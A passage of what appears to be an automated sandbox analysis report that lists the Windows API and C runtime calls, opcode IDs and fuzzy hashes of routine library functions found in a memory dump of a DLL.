                          • Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd
                          Similarity
                          • API ID: TextWindow$Exception@8H_prolog3Throw_memsetlstrcmplstrlen
                          • String ID:
                          • API String ID: 4273134663-0
                          • Opcode ID: b9789897c9f1e776ec03849be6d124385a0a786697be7934fd3a5e99b2327d41
                          • Instruction ID: 1e64ade53325632d4d2a32ade01619800b972efea18c0ccf2c554a18bb445bcd
                          • Opcode Fuzzy Hash: b9789897c9f1e776ec03849be6d124385a0a786697be7934fd3a5e99b2327d41
                          • Instruction Fuzzy Hash: 0F01C4B6504319A7DB40EF648C8899FB3AEEF45310F044467FA05D3141DF34F90487A0
                          APIs
                          • __getptd.LIBCMT ref: 6FD1FE1A
                            • Part of subcall function 6FD1A27F: __getptd_noexit.LIBCMT ref: 6FD1A282
                            • Part of subcall function 6FD1A27F: __amsg_exit.LIBCMT ref: 6FD1A28F
                          • __amsg_exit.LIBCMT ref: 6FD1FE3A
                          • __lock.LIBCMT ref: 6FD1FE4A
                          • InterlockedDecrement.KERNEL32(?), ref: 6FD1FE67
                          • InterlockedIncrement.KERNEL32(02931608), ref: 6FD1FE92
                          Memory Dump Source
                          • Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true
                          • Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd
                          Similarity
                          • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                          • String ID:
                          • API String ID: 4271482742-0
                          • Opcode ID: 032d92c7363854181c96037af80c99da8108261efab6c9f935abdc54614f41e1
                          • Instruction ID: f366c93e32d7bde19a66250fdc45a4fc80347eddbc65c4497d82d2157c3a170c
                          • Opcode Fuzzy Hash: 032d92c7363854181c96037af80c99da8108261efab6c9f935abdc54614f41e1
                          • Instruction Fuzzy Hash: 7B01D633E0DB21DBEB91DBA8A80478F77A0AF4A739F04010AD954A72C1CB35B551CBE1
                          APIs
                          • __lock.LIBCMT ref: 6FD14636
                            • Part of subcall function 6FD1A914: __mtinitlocknum.LIBCMT ref: 6FD1A92A
                            • Part of subcall function 6FD1A914: __amsg_exit.LIBCMT ref: 6FD1A936
                            • Part of subcall function 6FD1A914: RtlEnterCriticalSection.NTDLL(00000000), ref: 6FD1A93E
                          • ___sbh_find_block.LIBCMT ref: 6FD14641
                          • ___sbh_free_block.LIBCMT ref: 6FD14650
                          • HeapFree.KERNEL32(00000000,00000000,6FD2E828,0000000C,6FD1A270,00000000,?,6FD1A5D4,00000000,00000001,00000000,?,6FD1A89E,00000018,6FD2E978,0000000C), ref: 6FD14680
                          • GetLastError.KERNEL32(?,6FD1A5D4,00000000,00000001,00000000,?,6FD1A89E,00000018,6FD2E978,0000000C,6FD1A92F,00000000,00000000,?,6FD1A32A,0000000D), ref: 6FD14691
                          Memory Dump Source
                          • Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true
                          • Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd
                          Similarity
                          • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                          • String ID:
                          • API String ID: 2714421763-0
                          • Opcode ID: ad0788b33b668eccd1dd9060ae8e4a69fa6bf4352a286cb62ff739d4b0c04445
                          • Instruction ID: 690dafb694f2c04f5551565d4936bd858e279b8d96b4569f72c010b25c9157fc
                          • Opcode Fuzzy Hash: ad0788b33b668eccd1dd9060ae8e4a69fa6bf4352a286cb62ff739d4b0c04445
                          • Instruction Fuzzy Hash: B501627280DB15EBEFA0DFB4B80479D3B64AF0377EF644109E114AA0C0CB79B5508AA4
                          APIs
                          • TlsFree.KERNEL32(?,?,?,6FD0C179), ref: 6FD0C13B
                          • GlobalHandle.KERNEL32(?), ref: 6FD0C149
                          • GlobalUnlock.KERNEL32(00000000), ref: 6FD0C152
                          • GlobalFree.KERNEL32(00000000), ref: 6FD0C159
                          • RtlDeleteCriticalSection.NTDLL ref: 6FD0C163
                            • Part of subcall function 6FD0BF5D: RtlEnterCriticalSection.NTDLL(?), ref: 6FD0BFBC
                            • Part of subcall function 6FD0BF5D: RtlLeaveCriticalSection.NTDLL(?), ref: 6FD0BFCC
                            • Part of subcall function 6FD0BF5D: LocalFree.KERNEL32(?), ref: 6FD0BFD5
                            • Part of subcall function 6FD0BF5D: TlsSetValue.KERNEL32(?,00000000), ref: 6FD0BFE7
                          Memory Dump Source
                          • Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true
                          • Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd
                          Similarity
                          • API ID: CriticalFreeGlobalSection$DeleteEnterHandleLeaveLocalUnlockValue
                          • String ID:
                          • API String ID: 1549993015-0
                          • Opcode ID: 67c13714a71982bcaf3edc557702a367aba0a14576516303d68c68223120a88e
                          • Instruction ID: ae7970f38021036c141d8526f91687fdff4bb60bb65d49814cface6e150c410c
                          • Opcode Fuzzy Hash: 67c13714a71982bcaf3edc557702a367aba0a14576516303d68c68223120a88e
                          • Instruction Fuzzy Hash: 4CF05437604B00DBEA516F389C48E5A36B99F86670719061AF625D7280CF30F81387B1
                          APIs
                            • Part of subcall function 6FD0C220: RtlEnterCriticalSection.NTDLL(6FD334A8), ref: 6FD0C25A
                            • Part of subcall function 6FD0C220: RtlInitializeCriticalSection.NTDLL(?), ref: 6FD0C26C
                            • Part of subcall function 6FD0C220: RtlLeaveCriticalSection.NTDLL(6FD334A8), ref: 6FD0C279
                            • Part of subcall function 6FD0C220: RtlEnterCriticalSection.NTDLL(?), ref: 6FD0C289
                            • Part of subcall function 6FD0BB0C: __EH_prolog3_catch.LIBCMT ref: 6FD0BB13
                            • Part of subcall function 6FD06DC1: __CxxThrowException@8.LIBCMT ref: 6FD06DD7
                            • Part of subcall function 6FD06DC1: __EH_prolog3.LIBCMT ref: 6FD06DE4
                          • GetProcAddress.KERNEL32(00000000,HtmlHelpW), ref: 6FD11458
                          • FreeLibrary.KERNEL32(?), ref: 6FD11468
                          Strings
                          Memory Dump Source
                          • Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true
                          • Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd
                          Similarity
                          • API ID: CriticalSection$Enter$AddressException@8FreeH_prolog3H_prolog3_catchInitializeLeaveLibraryProcThrow
                          • String ID: HtmlHelpW$hhctrl.ocx
                          • API String ID: 2853499158-3773518134
                          • Opcode ID: 35e137d2eac3e666f3be00c0bad0fb09dbe232ae0ef8a8f40640d241e6d01749
                          • Instruction ID: 7d35b6536b802529123816921771650122ea4f878217eb130d47a368b7fe9d21
                          • Opcode Fuzzy Hash: 35e137d2eac3e666f3be00c0bad0fb09dbe232ae0ef8a8f40640d241e6d01749
                          • Instruction Fuzzy Hash: 1501D632508716E7D7A1AFB4DD04B4A3BE8AF04768F00C515F58A95590CB71F460D661
                          APIs
                          • ___BuildCatchObject.LIBCMT ref: 6FD1C7D6
                            • Part of subcall function 6FD1C731: ___BuildCatchObjectHelper.LIBCMT ref: 6FD1C767
                          • _UnwindNestedFrames.LIBCMT ref: 6FD1C7ED
                          • ___FrameUnwindToState.LIBCMT ref: 6FD1C7FB
                          Strings
                          Memory Dump Source
                          • Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true
                          • Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd
                          Similarity
                          • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                          • String ID: csm
                          • API String ID: 2163707966-1018135373
                          • Opcode ID: 9333c40b5dfdbc582cc92e6f10fbdaaaf62e4115b5764113ccc931296aa917a4
                          • Instruction ID: 1471fb76e14a713367d0cfdf0a8d5085f62b130e9ce020fc0ef7904660abc572
                          • Opcode Fuzzy Hash: 9333c40b5dfdbc582cc92e6f10fbdaaaf62e4115b5764113ccc931296aa917a4
                          • Instruction Fuzzy Hash: BB01E472048209BBDF529F51ED84EEA7F6AFF09358F104021BD1865160D772F9B1EBA1
                          APIs
                          • GetModuleHandleA.KERNEL32(KERNEL32,6FD177D7), ref: 6FD1ED7C
                          • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 6FD1ED8C
                          Strings
                          Memory Dump Source
                          • Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true
                          • Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd
                          Similarity
                          • API ID: AddressHandleModuleProc
                          • String ID: IsProcessorFeaturePresent$KERNEL32
                          • API String ID: 1646373207-3105848591
                          • Opcode ID: 65d3f4d043dcb9acd36953a8ab5f592aa7e6f58c5d74f4c3837fd3f0229799c5
                          • Instruction ID: 6f47e9fc839640dd8f2a924f5d7b322697102658e0cec3e4b4a1d821b85066c4
                          • Opcode Fuzzy Hash: 65d3f4d043dcb9acd36953a8ab5f592aa7e6f58c5d74f4c3837fd3f0229799c5
                          • Instruction Fuzzy Hash: 31F03031904E0DD3EF405BB1AD1A7AF7A79FB82756F860991E296A1084DF31B0B4D385
                          APIs
                          Memory Dump Source
                          • Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true
                          • Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd
                          Similarity
                          • API ID: File$SizeTime_memset
                          • String ID:
                          • API String ID: 151880914-0
                          • Opcode ID: 70e845391768a64e61e19b588a58687f2701095939fa9f6a031c565ec1295720
                          • Instruction ID: 83f61cba81ebba099b8ff3dc42b859751c5f9f2d896e6f742275a6e6d9e86e53
                          • Opcode Fuzzy Hash: 70e845391768a64e61e19b588a58687f2701095939fa9f6a031c565ec1295720
                          • Instruction Fuzzy Hash: 48510B76904705EFDB60DF68C94499AB7F8FF09320B108A2EE5A6D7690E734F944CB60
                          APIs
                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 6FD2084F
                          • __isleadbyte_l.LIBCMT ref: 6FD20883
                          • MultiByteToWideChar.KERNEL32(00000080,00000009,6FD140D8,6FD2BF84,00000000,00000000,?,?,?,?,6FD140D8,00000000,?), ref: 6FD208B4
                          • MultiByteToWideChar.KERNEL32(00000080,00000009,6FD140D8,00000001,00000000,00000000,?,?,?,?,6FD140D8,00000000,?), ref: 6FD20922
                          Memory Dump Source
                          • Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true
                          • Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd
                          Similarity
                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                          • String ID:
                          • API String ID: 3058430110-0
                          • Opcode ID: f6abcdde93470d03580d21a4ec8a847d15daf435538ba5cd7efc89021b1c1009
                          • Instruction ID: 4962987ef52219969b345b2501e7a40744b6daa8f77e30eaf505fb9d194554ae
                          • Opcode Fuzzy Hash: f6abcdde93470d03580d21a4ec8a847d15daf435538ba5cd7efc89021b1c1009
                          • Instruction Fuzzy Hash: 0331B131904345EFEB40EF64C8A8AAFBBF5AF05398B04856AE6659B091D730F940DBD0
                          APIs
                          • GlobalLock.KERNEL32(?), ref: 6FD088E7
                          • lstrcmpW.KERNEL32(00000000,?), ref: 6FD088F4
                          • GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 6FD0892E
                          • GlobalLock.KERNEL32(00000000), ref: 6FD08938
                            • Part of subcall function 6FD0DAD1: GlobalFlags.KERNEL32(?), ref: 6FD0DAE0
                            • Part of subcall function 6FD0DAD1: GlobalUnlock.KERNEL32(?), ref: 6FD0DAF2
                            • Part of subcall function 6FD0DAD1: GlobalFree.KERNEL32(?), ref: 6FD0DAFD
                          Memory Dump Source
                          • Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true
                          • Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd
                          Similarity
                          • API ID: Global$Lock$AllocFlagsFreeUnlocklstrcmp
                          • String ID:
                          • API String ID: 2391069079-0
                          • Opcode ID: 84bb4440647b5a2b9cb1bdd990ac20cc653a0f1149dc5d62f503ce87b34390c7
                          • Instruction ID: c76c66afa0c0dde7a4ffac7f49e06fb68d68ada123baf6c9551141f500ff48b1
                          • Opcode Fuzzy Hash: 84bb4440647b5a2b9cb1bdd990ac20cc653a0f1149dc5d62f503ce87b34390c7
                          • Instruction Fuzzy Hash: D7115872904A04BADF52AFA5CC48DAF7AEEFB85705B00041AFA0296060DB32E910D770
                          APIs
                          • RtlEnterCriticalSection.NTDLL(?), ref: 6FD0BFBC
                          • RtlLeaveCriticalSection.NTDLL(?), ref: 6FD0BFCC
                          • LocalFree.KERNEL32(?), ref: 6FD0BFD5
                          • TlsSetValue.KERNEL32(?,00000000), ref: 6FD0BFE7
                          Memory Dump Source
                          • Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true
                          • Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd
                          Similarity
                          • API ID: CriticalSection$EnterFreeLeaveLocalValue
                          • String ID:
                          • API String ID: 2949335588-0
                          • Opcode ID: 4626c3fb40a16f6e005be63dc71f987904af74c4175a50a99aaf084bb3d21693
                          • Instruction ID: 9109b22b621990875f490f25a8d1014bb0b9370eee715c263054ed11ca67cdf9
                          • Opcode Fuzzy Hash: 4626c3fb40a16f6e005be63dc71f987904af74c4175a50a99aaf084bb3d21693
                          • Instruction Fuzzy Hash: 1A115671604704EFE714DF54C884F9ABBA4FF46325F10852AE2528B5E1CB72B850CF60
                          APIs
                          • __EH_prolog3.LIBCMT ref: 6FD08ED0
                            • Part of subcall function 6FD09C7C: __EH_prolog3.LIBCMT ref: 6FD09C83
                          • __wcsdup.LIBCMT ref: 6FD08EF2
                          • GetCurrentThread.KERNEL32 ref: 6FD08F1F
                          • GetCurrentThreadId.KERNEL32 ref: 6FD08F28
                          Memory Dump Source
                          • Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true
                          • Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd
                          Similarity
                          • API ID: CurrentH_prolog3Thread$__wcsdup
                          • String ID:
                          • API String ID: 190065205-0
                          • Opcode ID: 57d83e6e8d6d6bfceb5889323a68f63f740f799484a57c5163384a18432d1be4
                          • Instruction ID: 7d5f06a0d8fdf2aced7a746a82c9441e327ae891fd23fdda3ccd160c12a38118
                          • Opcode Fuzzy Hash: 57d83e6e8d6d6bfceb5889323a68f63f740f799484a57c5163384a18432d1be4
                          • Instruction Fuzzy Hash: 532188B0904B40CFD7A1AF7A814024AFAE8BFA4704B108A1FD1AA87B61CBB1B040CF55
                          APIs
                          • SendMessageW.USER32(?,0000001F,00000000,00000000), ref: 6FD11D33
                          • SendMessageW.USER32(?,0000001F,00000000,00000000), ref: 6FD11D5E
                          • GetCapture.USER32 ref: 6FD11D70
                          • SendMessageW.USER32(00000000,0000001F,00000000,00000000), ref: 6FD11D7F
                          Memory Dump Source
                          • Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true
                          • Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd
                          Similarity
                          • API ID: MessageSend$Capture
                          • String ID:
                          • API String ID: 1665607226-0
                          • Opcode ID: bf52993e4b16a000189de65f86f13141402d7154ba6e7d03af2d852b32a43b76
                          • Instruction ID: 90c763add399dfa2e411e489989edbf33a7e4cd04d1aa46b868c556b58ed188b
                          • Opcode Fuzzy Hash: bf52993e4b16a000189de65f86f13141402d7154ba6e7d03af2d852b32a43b76
                          • Instruction Fuzzy Hash: 240171313443947BEE706B629CCDFDB3E7ADFCAB50F150079B6049A0E6CAA1A850D630
                          APIs
                          • __EH_prolog3.LIBCMT ref: 6FD06A8A
                            • Part of subcall function 6FD068E2: _malloc.LIBCMT ref: 6FD06900
                          • __CxxThrowException@8.LIBCMT ref: 6FD06AC0
                          • FormatMessageW.KERNEL32(00001100,00000000,?,00000800,6FD016A6,00000000,00000000,?,?,6FD2D898,00000004,6FD016A6,00000000,6FD069F9,00000000), ref: 6FD06AEA
                          • LocalFree.KERNEL32(6FD016A6,6FD016A6,00000000,6FD069F9,00000000), ref: 6FD06B12
                          Memory Dump Source
                          • Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true
                          • Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd
                          Similarity
                          • API ID: Exception@8FormatFreeH_prolog3LocalMessageThrow_malloc
                          • String ID:
                          • API String ID: 1776251131-0
                          • Opcode ID: 73409f6197804ccfae510cd9f51d7787341c3d94aa6032e14ad5fef21b7b5f09
                          • Instruction ID: 3b61bd565582c71b6254f30536ce411a3738dfdd050671dcf4acfbda3bf526ca
                          • Opcode Fuzzy Hash: 73409f6197804ccfae510cd9f51d7787341c3d94aa6032e14ad5fef21b7b5f09
                          • Instruction Fuzzy Hash: 6A112171504349AFEF44EF68CC44EAD3BA5EF45714F24C529F6258A2D0E731A5509B60
                          APIs
                          • RegSetValueExW.ADVAPI32(00000000,?,00000000,00000004,?,00000004), ref: 6FD0D194
                          • RegCloseKey.ADVAPI32(00000000), ref: 6FD0D19D
                          • swprintf.LIBCMT ref: 6FD0D1BA
                          • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 6FD0D1CB
                          Memory Dump Source
                          • Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true
                          • Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd
                          Similarity
                          • API ID: ClosePrivateProfileStringValueWriteswprintf
                          • String ID:
                          • API String ID: 22681860-0
                          • Opcode ID: 8a294b10bc75c2338a7d901861d7bbf77062d0ae6015d1456fb9e36d38d774b5
                          • Instruction ID: 1b9f328df0f812889fa67ec976a445346b28437a50099c8534c5e9aafd10d8bc
                          • Opcode Fuzzy Hash: 8a294b10bc75c2338a7d901861d7bbf77062d0ae6015d1456fb9e36d38d774b5
                          • Instruction Fuzzy Hash: 67016177900709BBDB10AF648C45FAFB7ADAF49714F14041AFA01A7180DF75F91487A5
                          APIs
                            • Part of subcall function 6FD068E2: _malloc.LIBCMT ref: 6FD06900
                          • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 6FD072BB
                          • GetCurrentProcess.KERNEL32(?,00000000), ref: 6FD072C1
                          • DuplicateHandle.KERNEL32(00000000), ref: 6FD072C4
                          • GetLastError.KERNEL32(?), ref: 6FD072DF
                          Memory Dump Source
                          • Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true
                          • Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd
                          Similarity
                          • API ID: CurrentProcess$DuplicateErrorHandleLast_malloc
                          • String ID:
                          • API String ID: 3704204646-0
                          • Opcode ID: e291cb1a252077b1e5d1f1afafd94e8ab94d3cded4765678c541274b412bc385
                          • Instruction ID: ae92e4438ce1874148dd1715f4920dd94294f1ca701a10581d67a3677b8bb0f3
                          • Opcode Fuzzy Hash: e291cb1a252077b1e5d1f1afafd94e8ab94d3cded4765678c541274b412bc385
                          • Instruction Fuzzy Hash: 72011E75A00706BBDB40ABB5CD89F5A7AA9AF85760F148516F605DF281DB71F800C760
                          APIs
                          • GetTopWindow.USER32(?), ref: 6FD10F9D
                          • GetTopWindow.USER32(00000000), ref: 6FD10FDC
                          • GetWindow.USER32(00000000,00000002), ref: 6FD10FFA
                          Memory Dump Source
                          • Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true
                          • Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd
                          Similarity
                          • API ID: Window
                          • String ID:
                          • API String ID: 2353593579-0
                          • Opcode ID: e85e2a0cc3d5590cc2980224e2769d2b553a2177bf82074b0bafaf4f32d8be88
                          • Instruction ID: 128e70648a106378a7d0e5732cb50ddd04220e9d7fe3c5561721c2afaf3c616c
                          • Opcode Fuzzy Hash: e85e2a0cc3d5590cc2980224e2769d2b553a2177bf82074b0bafaf4f32d8be88
                          • Instruction Fuzzy Hash: 68011B3204C61AFBDF42AF91AC0DEDE3A26AF493A0F044111FA1055060CB36E571EBA1
                          APIs
                          Memory Dump Source
                          • Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true
                          • Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd
                          Similarity
                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                          • String ID:
                          • API String ID: 3016257755-0
                          • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                          • Instruction ID: 19352c4ac7673a3fb1c0cb6c7b61137557082ac96a63781cdf56cc69228a6f6b
